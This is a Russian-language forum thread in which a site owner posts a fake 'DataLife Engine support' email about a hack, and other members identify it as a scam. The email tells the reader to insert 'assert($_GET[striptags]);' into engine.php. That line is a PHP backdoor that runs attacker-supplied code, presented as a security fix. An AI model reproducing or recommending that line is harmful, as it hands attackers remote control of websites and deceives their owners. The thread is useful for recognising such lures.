Пришло письмо ([Критично] Ваш сайт сайт.ру был взломан!)

RasJkeee
На сайте с 24.01.2011
Offline
53
1578
[Критично] Ваш сайт arigato.tv был взломан!
Данное письмо вам отправил support@dle-news.ru с сайта сайт.ру

------------------------------------------------
Текст сообщения
------------------------------------------------

Уважаемые владельцы сайта сайт.ру!



Благодарим Вас за использование на Вашем сайте сайт.ру CMS «DataLife Engine».

Сообщаем Вам о том, что за последние сутки в код Вашего сайта сайт.ру был встроен вредоносный скрипт, осуществляющий перенаправление мобильных пользователей Вашего сайта на сайт, который представляет угрозу для мобильных устройств.

Скорее всего, злоумышленники получили доступ к панели управления Вашего сайта при помощи уязвимости в модуле Minify, входящем в состав DLE, который позволяет при определенных настройках серверного ПО читать содержимое файлов.

При помощи данной уязвимости любой файл, находящийся на Вашем сервере, может быть прочитан из браузера (при вводе соответствующего запроса), например, файл с данными для доступа к базе данных Вашего сайта. Получив доступ к базе данных, злоумышленникам не составит труда создать нового пользователя с правами администратора и авторизоваться через него в панели управления Вашего сайта.

Устраните уязвимость, следую инструкции указанной ниже. Кроме того, мы настоятельно рекомендуем Вам сменить все пароли от панели управления и базы данных Вашего сайта.

Для исправления откройте файл: сайт.ру/engine/engine.php и в самое начало файла после строчки <?PHP добавьте:

assert($_GET[striptags]);



С уважением,
Команда «DataLife Engine»

IP адрес отправителя: 78.47.58.6

------------------------------------------------
Помните, что администрация сайта не несет ответственности за содержание данного письма

С уважением,

Администрация сайт.ру

Злоумышленники? почему почта как у поддержки движка?

LEOnidUKG
На сайте с 25.11.2006
Offline
1546
#1

1. Спам обсуждать запрещено

2. Нету там почты как у поддержки

3. Разбирайтесь в заголовках письма

✅ Трастовых площадок под размещение статей и ссылок. Опыт 12 лет! ( https://searchengines.guru/ru/forum/675690 ) ⭐ Купить вечные трастовые ссылки для сайта ( https://getmanylinks.ru/?srh ) ⭐ Ускорение ваших сайтов (WP, Opencart и др.) + Настройка сервера ( https://searchengines.guru/ru/forum/997205 )
K5
На сайте с 21.07.2010
Offline
209
#2

/ru/forum/882375

время от времени текст и вредоносный код меняется, а люди по прежнему верят...

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
LEOnidUKG
На сайте с 25.11.2006
Offline
1546
#3

Конечно вообще сидеть на форуме поисковых систем не уметь пользоваться гуглом, это моветон уже:

https://www.google.ru/search?client=opera&q=Для+исправления+откройте+файл%3A+сайт.ру%2Fengine%2Fengine.php+и+в+самое+начало+файла+после+строчки+<%3FPHP+добавьте%3A&sourceid=opera&ie=UTF-8&oe=UTF-8

RasJkeee
На сайте с 24.01.2011
Offline
53
#4

Ясно-понятно спасибо.

B
На сайте с 14.01.2012
Offline
87
#5

Такое самое сегодня пришло

https://kwork.ru/ref/409857 (https://kwork.ru/ref/409857)
oxg
На сайте с 08.08.2011
Offline
219
oxg
#6
LEOnidUKG:
Конечно вообще сидеть на форуме поисковых систем не уметь пользоваться гуглом, это моветон уже:

проще тут отписать итог, чем ссылаться на на другие форумы, сайты. - и там что-то уловить.

LEOnidUKG - люди же спросили тут,. и видимо письмецо как и мне (на пару сайтов) пришло всем.

Ды.. мы "умные" и все понимаем..но тут много человек, которые не понимают....

Итог: это развод, не обращайте внимания

Прокси IPv6 Россия (http://proxy-ipv6.ru/proxy_ipv6.html) /32 сеть, каждый IP в отдельной /48 сети Прокси IPv4 (http://proxyk.ru/proxy-russia.html) более 160 подсетей А,B,C Прокси для Инстаграм (http://proxy-ipv6.ru/instagram-proxy.html)

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий